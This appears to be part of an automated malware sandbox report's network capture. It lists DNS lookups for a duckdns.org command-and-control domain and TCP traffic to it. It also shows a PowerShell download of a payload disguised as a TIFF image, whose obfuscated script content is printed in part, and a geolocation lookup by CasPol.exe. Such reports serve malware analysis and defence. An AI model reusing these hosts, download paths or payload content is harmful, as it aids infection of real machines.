                                                                                                                Dec 16, 2024 07:12:38.990156889 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.991276026 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.991374969 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.991813898 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.991871119 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.992811918 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.992866039 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.992918968 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.993823051 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.993911028 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.993962049 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.995106936 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.995162010 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.995981932 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.996340990 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.996474981 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.997565031 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.997618914 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.997721910 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.998856068 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.998912096 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.998975992 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.999026060 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.000117064 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.000211000 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.000264883 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.001358986 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.001467943 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.001523018 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.002629042 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.002741098 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.003092051 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.003788948 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127348900 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127449036 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127496004 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127552032 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.127654076 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.127655029 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.128452063 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.128528118 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.128698111 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.129430056 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.129539013 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.129722118 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.130489111 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.130542994 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.130547047 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.131444931 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.131500006 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.131580114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.132457972 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.132519960 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.132575989 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.133471966 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.133594036 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.133649111 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.134466887 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.134603024 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.134655952 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.135468960 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.135530949 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.135622025 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.136522055 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.136576891 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.136584044 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.137494087 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.137608051 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.137645006 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.138518095 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.138576031 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.138636112 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.139547110 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.139698982 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.139750957 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.140542984 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.140681028 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.140739918 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.141544104 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.141655922 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.141709089 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.142541885 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.142595053 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.142647982 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.143591881 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.143641949 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.143724918 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.144583941 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.144644022 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.144691944 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.145582914 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.145709038 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.145761967 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.146646976 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.146814108 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.146863937 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.147600889 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.147695065 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.147700071 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.148634911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.148694038 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.148749113 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.149619102 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.149672985 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.149739981 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.150643110 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.150696993 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:39.150696993 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.151619911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:39.152316093 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:40.597604990 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:40.717991114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718010902 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718024015 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718035936 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718064070 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718075991 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718087912 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718100071 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718116045 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.718138933 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:40.718138933 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:40.718189001 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838051081 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838082075 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838109970 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838221073 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838248968 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838280916 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838659048 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:40.838723898 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:13:07.204369068 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:13:07.205672979 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:13:07.338561058 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:13:37.647975922 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:13:37.649298906 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:13:37.769485950 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:14:08.069878101 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:14:08.071892977 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:14:08.191962004 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:14:26.076879978 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:14:26.404227018 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:14:27.044168949 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:14:28.325437069 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:14:30.887974977 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:14:35.997327089 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:14:38.458136082 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:14:38.459567070 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:14:38.579684973 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:14:46.247361898 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:15:08.489736080 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:15:08.491771936 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:15:08.611573935 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:15:39.494973898 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:15:39.498414993 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:15:39.618335962 CET1464649739107.173.143.31192.168.2.4
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 16, 2024 07:12:08.862148046 CET5359053192.168.2.41.1.1.1
                                                                                                                Dec 16, 2024 07:12:30.021754026 CET6202153192.168.2.41.1.1.1
                                                                                                                Dec 16, 2024 07:12:30.433468103 CET53620211.1.1.1192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.560504913 CET6541053192.168.2.41.1.1.1
                                                                                                                Dec 16, 2024 07:12:33.899667025 CET53654101.1.1.1192.168.2.4
                                                                                                                Dec 16, 2024 07:12:36.082838058 CET4992953192.168.2.41.1.1.1
                                                                                                                Dec 16, 2024 07:12:36.222424984 CET53499291.1.1.1192.168.2.4
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 16, 2024 07:12:08.862148046 CET192.168.2.41.1.1.10x3fcStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                Dec 16, 2024 07:12:30.021754026 CET192.168.2.41.1.1.10x21ecStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                Dec 16, 2024 07:12:33.560504913 CET192.168.2.41.1.1.10xeb06Standard query (0)kelexrmcadmnnccupdated.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                Dec 16, 2024 07:12:36.082838058 CET192.168.2.41.1.1.10x7a18Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 16, 2024 07:12:09.263643026 CET1.1.1.1192.168.2.40x3fcNo error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                Dec 16, 2024 07:12:30.433468103 CET1.1.1.1192.168.2.40x21ecNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                Dec 16, 2024 07:12:30.433468103 CET1.1.1.1192.168.2.40x21ecNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                Dec 16, 2024 07:12:33.899667025 CET1.1.1.1192.168.2.40xeb06No error (0)kelexrmcadmnnccupdated.duckdns.org107.173.143.31A (IP address)IN (0x0001)false
                                                                                                                Dec 16, 2024 07:12:36.222424984 CET1.1.1.1192.168.2.40x7a18No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                • paste.ee
                                                                                                                • 192.3.122.159
                                                                                                                • geoplugin.net
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449730192.3.122.159807528C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 16, 2024 07:12:02.946059942 CET339OUTGET /121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF HTTP/1.1
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                Host: 192.3.122.159
                                                                                                                Connection: Keep-Alive
                                                                                                                Dec 16, 2024 07:12:04.055463076 CET1236INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 16 Dec 2024 06:12:04 GMT
                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                Last-Modified: Sun, 15 Dec 2024 14:46:42 GMT
                                                                                                                ETag: "25af0-6295021e00b94"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 154352
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: image/tiff
                                                                                                                Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 4e 00 67 00 70 00 48 00 47 00 47 00 6f 00 70 00 71 00 66 00 7a 00 62 00 75 00 49 00 69 00 20 00 3d 00 20 00 22 00 49 00 47 00 73 00 50 00 65 00 55 00 4c 00 47 00 47 00 52 00 43 00 68 00 6f 00 4b 00 4b 00 22 00 0d 00 0a 00 4e 00 69 00 6f 00 69 00 57 00 54 00 4f 00 4e 00 61 00 42 00 43 00 47 00 6b 00 52 00 6c 00 20 00 3d 00 20 00 22 00 71 00 57 00 47 00 6b 00 5a 00 43 00 4b 00 53 00 75 00 41 00 4b 00 5a 00 48 00 43 00 43 00 22 00 0d 00 0a 00 73 00 4c 00 6b 00 71 00 72 00 50 00 4c 00 4c 00 57 00 50 00 64 00 4f 00 4c 00 7a 00 41 00 20 00 3d 00 20 00 22 00 57 00 6d 00 4b 00 65 00 47 00 49 00 4b 00 4e 00 75 00 57 00 75 00 63 00 6b 00 61 00 7a 00 22 00 0d 00 0a 00 0d 00 0a 00 6c 00 6f 00 50 00 6b 00 48 00 4c 00 6f 00 6b 00 4b 00 6d 00 4c 00 73 00 42 00 4c 00 57 00 20 00 3d 00 20 00 22 00 69 00 55 00 57 00 4b 00 69 00 70 00 4c 00 49 00 4b 00 74 00 75 00 69 00 70 00 57 00 4e 00 22 00 0d 00 0a 00 41 00 69 00 55 00 75 00 4b 00 6e 00 6b 00 64 00 62 00 4b 00 [TRUNCATED]
                                                                                                                Data Ascii: NgpHGGopqfzbuIi = "IGsPeULGGRChoKK"NioiWTONaBCGkRl = "qWGkZCKSuAKZHCC"sLkqrPLLWPdOLzA = "WmKeGIKNuWuckaz"loPkHLokKmLsBLW = "iUWKipLIKtuipWN"AiUuKnkdbKRLPLu = "ALANcLAPJztWWuI"LmLheWtcahtGKkt = "RCZbqUxkiaWoPep"kLnRAohxoUmtOlQ = "ikGKIlLUjaBGmRA"WpxUClcHAtLGOLp = "jCPuRocBSWGoWiK"ZZWcGifIOoxsOuG = "tBzbmtipNUALKAi"LrdWULlbPiotxiU = "LWIAxLLimcaLPAt"pkZqlPppLtinihk = "pLktbCULLPLdpGA"lZcLcqcOzmippUA = "GxGHWCTzxZkztic"PkKcCR
                                                                                                                Dec 16, 2024 07:12:04.055512905 CET1236INData Raw: 00 6f 00 50 00 4a 00 63 00 57 00 4c 00 57 00 52 00 6b 00 20 00 3d 00 20 00 22 00 4e 00 57 00 68 00 74 00 4e 00 62 00 70 00 55 00 78 00 52 00 4f 00 62 00 61 00 78 00 71 00 22 00 0d 00 0a 00 6f 00 53 00 64 00 4b 00 62 00 4a 00 5a 00 48 00 75 00 54
                                                                                                                Data Ascii: oPJcWLWRk = "NWhtNbpUxRObaxq"oSdKbJZHuTGnciA = "zLLPTSivoUWZeHA"cTxRWGcWJCGLici = "rCoqLKphZiiiGsC"NZiLWuUOGQWGiP
                                                                                                                Dec 16, 2024 07:12:04.055597067 CET1236INData Raw: 00 47 00 4b 00 72 00 53 00 42 00 50 00 22 00 0d 00 0a 00 69 00 4b 00 55 00 57 00 78 00 4f 00 69 00 4f 00 4f 00 69 00 6d 00 70 00 57 00 74 00 69 00 20 00 3d 00 20 00 22 00 7a 00 75 00 4c 00 50 00 68 00 55 00 48 00 66 00 64 00 69 00 65 00 57 00 47
                                                                                                                Data Ascii: GKrSBP"iKUWxOiOOimpWti = "zuLPhUHfdieWGiu"mCLWPWxcWvbKiZR = "BaLCjQqiqBkLiRi"KcLeobqrccbhUpb = "ckWJLaKmHzmAhAG"o
                                                                                                                Dec 16, 2024 07:12:04.055632114 CET1236INData Raw: 00 47 00 4b 00 20 00 3d 00 20 00 22 00 6c 00 51 00 65 00 6f 00 66 00 64 00 69 00 57 00 6d 00 63 00 57 00 66 00 4c 00 57 00 69 00 22 00 0d 00 0a 00 70 00 63 00 6b 00 52 00 6f 00 6e 00 6a 00 50 00 47 00 74 00 67 00 61 00 4b 00 42 00 5a 00 20 00 3d
                                                                                                                Data Ascii: GK = "lQeofdiWmcWfLWi"pckRonjPGtgaKBZ = "WQLmaIcKZKfcPez"mrGeeciWathqstO = "LLPJkWIgKTgUUoo"URnGlLTmGZLGAPm = "Wzbk
                                                                                                                Dec 16, 2024 07:12:04.055665016 CET1236INData Raw: 00 6d 00 54 00 6f 00 69 00 6c 00 75 00 50 00 47 00 4c 00 6e 00 7a 00 66 00 68 00 63 00 4e 00 20 00 3d 00 20 00 22 00 64 00 76 00 68 00 65 00 43 00 6f 00 6f 00 4b 00 54 00 6e 00 66 00 61 00 74 00 74 00 4b 00 22 00 0d 00 0a 00 7a 00 4c 00 6d 00 52
                                                                                                                Data Ascii: mToiluPGLnzfhcN = "dvheCooKTnfattK"zLmRKIqWKpxqKWu = "fzlclRrcUSLulUz"LOKioKZLLeHbRic = "pCLSWbxkeNRabcx"WhoZmbPG
                                                                                                                Dec 16, 2024 07:12:04.055717945 CET1236INData Raw: 00 55 00 69 00 75 00 47 00 43 00 71 00 47 00 4c 00 64 00 74 00 65 00 48 00 22 00 0d 00 0a 00 6b 00 6a 00 50 00 55 00 4e 00 57 00 50 00 47 00 73 00 47 00 4a 00 75 00 7a 00 71 00 69 00 20 00 3d 00 20 00 22 00 4c 00 6e 00 4c 00 71 00 6a 00 70 00 4b
                                                                                                                Data Ascii: UiuGCqGLdteH"kjPUNWPGsGJuzqi = "LnLqjpKKsCcUbUk"QeqxWarGWLJfxab = "sodAWIuQchrciqe"CHGxQaeNmBrtPAa = "xZWNxNdLtefRW
                                                                                                                Dec 16, 2024 07:12:04.055751085 CET1236INData Raw: 00 66 00 47 00 4c 00 41 00 78 00 6e 00 64 00 63 00 20 00 3d 00 20 00 22 00 66 00 47 00 69 00 4c 00 7a 00 42 00 49 00 6d 00 66 00 6e 00 5a 00 55 00 57 00 55 00 69 00 22 00 0d 00 0a 00 43 00 5a 00 41 00 4c 00 55 00 41 00 65 00 6e 00 7a 00 52 00 4b
                                                                                                                Data Ascii: fGLAxndc = "fGiLzBImfnZUWUi"CZALUAenzRKUGpK = "eHOhKbWZKHjvhGh"WCepLzcWAzGCnzx = "iKKenZiZBZGpWif"zRnGLczNztTLfUt =
                                                                                                                Dec 16, 2024 07:12:04.055785894 CET1236INData Raw: 00 47 00 68 00 69 00 22 00 0d 00 0a 00 73 00 52 00 4c 00 69 00 6d 00 65 00 57 00 53 00 63 00 6f 00 4c 00 6e 00 57 00 41 00 53 00 20 00 3d 00 20 00 22 00 55 00 47 00 41 00 50 00 57 00 70 00 4b 00 7a 00 5a 00 62 00 4b 00 4c 00 63 00 52 00 55 00 22
                                                                                                                Data Ascii: Ghi"sRLimeWScoLnWAS = "UGAPWpKzZbKLcRU"WZnuNueccaPceLB = "etsUKbOCLPWtliU"NLNiduoCOOJGUKW = "KnjcTbkWGSdAAWL"bi
                                                                                                                Dec 16, 2024 07:12:04.055819035 CET1236INData Raw: 00 3d 00 20 00 22 00 69 00 4c 00 71 00 69 00 47 00 6c 00 4c 00 6b 00 62 00 74 00 47 00 65 00 7a 00 71 00 50 00 22 00 0d 00 0a 00 4a 00 6d 00 74 00 6b 00 75 00 4e 00 62 00 6b 00 70 00 7a 00 7a 00 68 00 62 00 69 00 57 00 20 00 3d 00 20 00 22 00 4f
                                                                                                                Data Ascii: = "iLqiGlLkbtGezqP"JmtkuNbkpzzhbiW = "OcpIpqLPKBkUrCT"konGAkZNrWIWpUW = "LbUqaUWdeAckibG"bNjWPPciRKaPnpi = "clGQLLL
                                                                                                                Dec 16, 2024 07:12:04.055856943 CET1236INData Raw: 00 73 00 69 00 47 00 4f 00 4e 00 62 00 75 00 57 00 57 00 4a 00 47 00 69 00 4e 00 61 00 20 00 3d 00 20 00 22 00 43 00 4b 00 66 00 74 00 5a 00 53 00 4b 00 61 00 57 00 4b 00 48 00 69 00 62 00 4b 00 57 00 22 00 0d 00 0a 00 6c 00 6d 00 6c 00 66 00 6b
                                                                                                                Data Ascii: siGONbuWWJGiNa = "CKftZSKaWKHibKW"lmlfkKimiWoUxBW = "oSKSiocGCnLfKNp"LUzhqhGgoLqmOjo = "ULeZpWKiUhUlQte"qsLpWiKhcAi
                                                                                                                Dec 16, 2024 07:12:04.176161051 CET1236INData Raw: 00 42 00 55 00 4c 00 61 00 73 00 6f 00 4c 00 4c 00 47 00 22 00 0d 00 0a 00 4b 00 57 00 74 00 4b 00 78 00 4b 00 41 00 78 00 62 00 4b 00 61 00 70 00 70 00 72 00 43 00 20 00 3d 00 20 00 22 00 7a 00 41 00 74 00 65 00 4c 00 4c 00 64 00 57 00 66 00 57
                                                                                                                Data Ascii: BULasoLLG"KWtKxKAxbKapprC = "zAteLLdWfWkslOi"ZoBnZdAKzzZizcA = "ulhxlGcPLvmofai"kLbLRUzmBpOIWLA = "uLcgNKkmNNoWop


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449741178.237.33.50806772C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 16, 2024 07:12:36.346940041 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                Host: geoplugin.net
                                                                                                                Cache-Control: no-cache
                                                                                                                Dec 16, 2024 07:12:37.593066931 CET1171INHTTP/1.1 200 OK
                                                                                                                date: Mon, 16 Dec 2024 06:12:37 GMT
                                                                                                                server: Apache
                                                                                                                content-length: 963
                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                cache-control: public, max-age=300
                                                                                                                access-control-allow-origin: *
